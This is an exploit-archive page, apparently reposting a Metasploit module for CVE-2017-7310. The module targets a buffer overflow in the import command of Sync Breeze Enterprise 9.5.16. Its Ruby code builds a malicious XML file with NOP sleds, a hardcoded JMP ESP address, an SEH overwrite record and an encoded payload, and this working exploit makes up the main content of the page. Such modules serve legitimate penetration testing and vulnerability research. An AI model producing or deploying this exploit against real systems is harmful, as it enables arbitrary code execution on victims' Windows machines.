Sync Breeze Enterprise 9.5.16 Import Command Buffer Overflow

Sync Breeze Enterprise 9.5.16 Import Command Buffer Overflow: Posted Jan 24, 2018; Authored by Daniel Teixeira | Site metasploit.com; This Metasploit module exploits a buffer overflow in Sync Breeze Enterprise 9.5.16 by using the import command option to import a specially crafted xml file.; tags | exploit, overflow; advisories | CVE-2017-7310; SHA-256 | ada5d696765b728572e1a595fac470a36fc9c4ab834fd1652c6a8cf1e8b799c1; Download | Favorite | View

Sync Breeze Enterprise 9.5.16 Import Command Buffer Overflow

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'            => 'Sync Breeze Enterprise 9.5.16 - Import Command Buffer Overflow',
      'Description'     => %q(
        This module exploits a buffer overflow in Sync Breeze Enterprise 9.5.16
        by using the import command option to import a specially crafted xml file.
      ),
      'License'         => MSF_LICENSE,
      'Author'          =>
        [
          'Daniel Teixeira'
        ],
      'References'      =>
        [
          [ 'CVE', '2017-7310' ],
          [ 'EDB', '41773' ]
        ],
      'DefaultOptions'  =>
        {
          'EXITFUNC' => 'seh',
          'DisablePayloadHandler' => 'true'
        },
      'Platform'        => 'win',
      'Payload'         =>
        {
          'BadChars' => "\x00\x01\x02\x0a\x0b\x0c\x22\x27",
          'StackAdjustment' => -3500
        },
      'Targets'         =>
        [
          ['Windows Universal', { 'Ret' => 0x10015FFE } ]
        ],
      'Privileged'      => false,
      'DisclosureDate'  => 'Mar 29 2017',
      'DefaultTarget'   => 0))

    register_options(
      [
        OptString.new('FILENAME', [true, 'The file name.', 'msf.xml'])
      ])
  end

  def exploit
    jmpesp = "\x7A\xB7\x1B\x65" # JMP ESP QtGui4.dll
    esp = "\x8D\x44\x24\x4C" # LEA EAX, [ESP+76]
    jmp = "\xFF\xE0" # JMP ESP

    buffer =  "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<classify\nname=\'"
    buffer << "\x90" * 1536
    buffer << jmpesp
    buffer << "\x90" * 18
    buffer << esp
    buffer << jmp
    buffer << "\x90" * 68
    buffer << generate_seh_record(target.ret)
    buffer << "\x90" * 10
    buffer << payload.encoded
    buffer << "\x90" * 5000
    buffer << "\n</classify>"

    print_status("Creating '#{datastore['FILENAME']}' file ...")
    file_create(buffer)
  end
end

Top Authors In Last 30 Days

Red Hat 234 files
indoushka 108 files
Ubuntu 87 files
Gentoo 36 files
Jasper Nota 25 files
Debian 20 files
Willem Westerhof 19 files
Jim Blankendaal 11 files
Martijn Baalman 9 files
Apple 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,100)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,567)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,789)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,546)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,754)
UNIX (9,437)
UnixWare (187)
Windows (6,674)
Other

Sync Breeze Enterprise 9.5.16 Import Command Buffer Overflow

Sync Breeze Enterprise 9.5.16 Import Command Buffer Overflow

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Sync Breeze Enterprise 9.5.16 Import Command Buffer Overflow

Share This

Sync Breeze Enterprise 9.5.16 Import Command Buffer Overflow

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems